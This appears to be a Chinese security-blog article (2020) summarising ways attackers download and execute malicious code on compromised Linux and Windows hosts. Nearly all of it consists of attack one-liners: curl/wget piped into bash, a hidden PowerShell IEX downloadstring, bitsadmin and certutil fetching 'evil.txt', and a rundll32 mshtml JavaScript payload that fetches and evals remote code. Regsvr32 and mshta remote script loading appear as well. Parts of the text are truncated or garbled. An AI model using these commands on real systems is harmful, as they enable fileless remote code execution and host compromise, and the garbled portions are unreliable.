标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2024-2734] 作者: 闲云野鸡 发表于: [2020-08-21]
本文共 [412] 位读者顶过
在渗透过程中,攻击者往往需要通过命令下载执行恶意代码,实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。 在目标主机执行恶意代码,可以分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来,我们来总结一下Linux和Windows中下载和执行恶意代码的一些姿势。
一、Linux 远程恶意代码执行[出自:jiwo.org]
01、curl 以用curl的方式执行http页面上的shell脚本,无需download,在本地机器上直接执行。
方式1:curl -fsSL http://192.168.99.19:8080/test.sh | bash
执行wget命令远程下载恶意程序。
方式1:wget -q -O- http://192.168.99.19:8080/test.sh | bash
curl+wget合并,实现无文件远程恶意代码执行。
bash -c '(curl -fsSL http://192.168.99.19:8080/test.sh||
rcp命令用于复制远程文件或目录。
1 rcp root@x.x.x.x:./testfile testfile 04、scp
scp 是 rcp 的加强版,scp 是加密的,rcp 是不加密的。
1 scp username@servername:/path/filename /tmp/local_destination
05、rsync 使用rsync可以进行远程同步,拉取文件到本地服务器。
1 rsync -av x.x.x.x:/tmp/passwd.txt /tmp/passwd.txt
06、sftp
使用sftp下载远程服务器上的文件。
1 sftp admin@192.168.99.242 <<EOF 01、Powershell
利用powershell远程执行ps1脚本。 1 powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.28.128/evil.txt'))" 02、Bitsadmin 利用bitsadmin命令下载文件到目标机器。
1 bitsadmin /transfer n http://192.168.28.128/imag/evil.txt d:\test\1.txt
03、certutil
用于备份证书服务,一般建议下载完文件后对缓存进行删除。 2 #删除缓存certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt delete 3 certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt delete 04、rundll32
使用rundll32.exe,可以通过mshtml.dll执行JavaScript ,依赖于WScript.shell这个组件
1 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.28.131:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
05、regsvr32
远程加载执行,解析.src文件。 1 regsvr32.exe /u /n /s /i:http://192.168.28.131:8888/file.sct scrobj.dll1 mshta http://192.168.28.128/run.hta
|